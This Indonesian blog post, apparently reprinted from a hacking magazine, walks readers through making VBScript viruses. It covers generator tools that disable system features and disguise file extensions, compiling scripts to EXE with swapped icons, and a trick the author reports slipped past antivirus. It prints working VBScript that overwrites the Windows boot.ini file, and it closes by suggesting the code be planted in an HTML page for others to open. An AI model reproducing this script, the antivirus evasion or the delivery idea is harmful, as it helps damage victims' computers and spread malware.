Virus dengan VBS Generator(Visual BaSic)

/-- Begin
- Tulisan ini ditujukan kepada yang ingin tahu ‘Cara - Sebab – Akibat’ pada dunia komputer
terutama dalam masalah virus komputer.
- Apabila terdapat kesamaan idea pada tulisan ini , penulis mohon maaf karena pengetahuan ini
penulis dapatkan dari berbagai referensi :
‘Buku - Forum – Google’
/-- Visual Basic Script [VBScript] , Simple but Strong
Visual Basic Script atau yang biasa di sebut dengan VBScript adalah bahasa pemrograman yang
berjalan di lingkungan WiND0WS. Beberapa tahun terakhir banyak di jumpai Virus yang menggunakan
bahasa pemrograman VBScript. Dan juga banyak terdapat 'VBS Generator' untuk menghasilkan virus
berbasis bahasa pemrograman VBScript. Kemampuan VBScript pun tidak kalah dengan pemrograman
lain. VBScript mempunyai kemampuan Membaca , Merubah , Menghapus , bahkan Merubah Attribute
sebuah file. Untuk hal ini akan penulis tunjukan di akhir cerita ;) . lanjut..
‘Rem --- Contoh ‘VBS Generator’ ---

Cara menggunakan ‘Tools’ seperti ini boleh di bilang sederhana. User hanya tinggal men-
Download di Internet , tentukan nama virus , nama file induk , fitur system yang akan di Disable , Extension
file samaran untuk mengelabui korban bahkan untuk meng-Enkripsi Code VBScript. Simple but Strong ,
itulah hal pertama yang terlintas di benak penulis. Selesai sampai di sini kah ? jawabnya adalah : belum..
Ternyata , source yang kita Generate sebelumnya dengan menggunakan ‘Generator Tools’ bias di
Compile dengan menggunakan Software Compiler seperti Vbs2Exe , Exescript , Scriptcryptor , dll. Google iT
!
‘Rem --- Contoh ‘VBS Compiler’
Cara penggunaan software ini pun boleh dibilang simple , input path file VBS yang telah kita buat
sebelumnya menggunakan ‘Generator Tools’ lalu tentukan icon yang akan digunakan. Seperti biasa , para
pembuat virus akan menggunakan icon sebuah file yang sangat sering dijumpai oleh para pengguna
System Operasi Windows. Yaitu icon Folder atau icon Word. Untuk mendapatkan icon² tersebut bias di
dapatkan di Internet. Google iT !
Menurut pengalaman penulis , apabila menggunakan icon Folder atau Word akan langsung terdeteksi
oleh Antivirus yang rajin di update. Tetapi pernah sekali waktu penulis mencoba menggunakan icon biasa
yang di ambil dari sebuah program Executable[.exe] dengan menggunakan ResHack , file hasil compile
tersebut tidak terdeteck oleh Antivirus. Sampai sekarang hal itu masih menjadi pertanyaan untuk penulis.
Mungkin ada yang tau sebabnya ? Silahkan diskusikan di Forum ;) .
Sampai disini ceritanya ? Belum ;D masih ada lagi hehehehe..
Mengingat kemampuan VBScript untuk mengubah attribute sebuah file , penulis mencoba untuk membuat
Code sederhana menggunakan VBScript. Sebelumnya , BACKUP terlebih dahulu file boot.ini yang ada
pada drive C: , atau drive yang digunakan untuk system operasi windows. Copy file boot.ini ke dalam
folder lain terserah anda.
‘Rem --- BOC ---
set fso = Createobject("Scripting.filesystemobject")
set f2 = fso.getfile("c:\boot.ini")
f2.attributes = 0
set boot = fso.createtextfile("C:\boot.ini",true)
boot.writeline "[Boot Loader]"
boot.writeline "timeout=15"
boot.writeline "Default=C:\"
boot.writeline ""
boot.writeline "[Operating Systems]"
boot.writeline "C:\" & chr(34) & "Windows - Yogyafre" & chr(34) & " /fastdetect"
boot.writeline "D:\" & chr(34) & "Microsoft Windows eXPe" & chr(34)
boot.writeline "E:\" & chr(34) & "Microsoft Windows etC" & chr(34)
boot.close
‘Rem --- EOC ---

Copy – Paste Code tersebut ke dalam Notepad , dan Save as sebagai .vbs
Contoh : iseng.vbs . lalu jalankan file tersebut dengan men-Double klik file tersebut.
‘Rem --- Isi file boot.ini sebelum file iseng.vbs di eksekusi ---

‘Rem --- Isi file boot.ini setelah file iseng.vbs di eksekusi ---


Hmm.. lalu.. gimana klo windows di restart ? entahlah.. ada yg mau coba ? ;D klo saya sih ga mau.
Jangan Restart atau Shutdown sebelum file boot.ini di perbaiki. Sekarang buka file boot.ini yang telah di
backup sebelumnya. Copy isi file backup boot.ini ke dalam file asli boot.ini
/-- Sedikit Penjelasan
Penulis hanya orang awam yang kurang mengerti bahasa pemrograman ataupun keamanan
computer. Tapi disini penulis mencoba sedikit menjelaskan beberapa point penting dari Code yang
sebelumnya telah di coba.
‘Rem --- Penjelasan Code ---
set f2 = fso.getfile("c:\boot.ini") ‘dapatkan file boot.ini pada direktori C:
f2.attributes = 0 ‘untuk merubah attribute sebuah file menjadi ‘Normal’
set boot = fso.createtextfile("C:\boot.ini",true) ‘untuk membuat / menimpa isi dari file boot.ini
boot.writeline ‘klo ini mungkin ga perlu di jelaskan kali ya ;D
/-- End
Akhir dari tulisan ini penulis harap teman² yang membaca , terutama para newbie dan orang
awam seperti penulis dapat mengerti ‘Cara – Sebab – Akibat’ dari sebuah Code VBScript yang sedikit
‘kejam’ ?! ;D
Penulis mohon maaf apabila terdapat kesalahan penulisan dan penjelasan dan maaf sebesarbesarnya
tulisan ini udah basi bagi para pembaca X-Code Magz :)
Sedikit tambahan ide. Gimana kalo Code tersebut di masukan ke dalam file HTML lalu di upload
sebagai file HTML dan di akses oleh orang lain melalui browser Internet Explorer ? ;D hanya ide
=================================================================[-][o][x]===============
Posted on 04.34 by Gus Putra Ismaulana and filed under | 0 Comments »

0 komentar:

Posting Komentar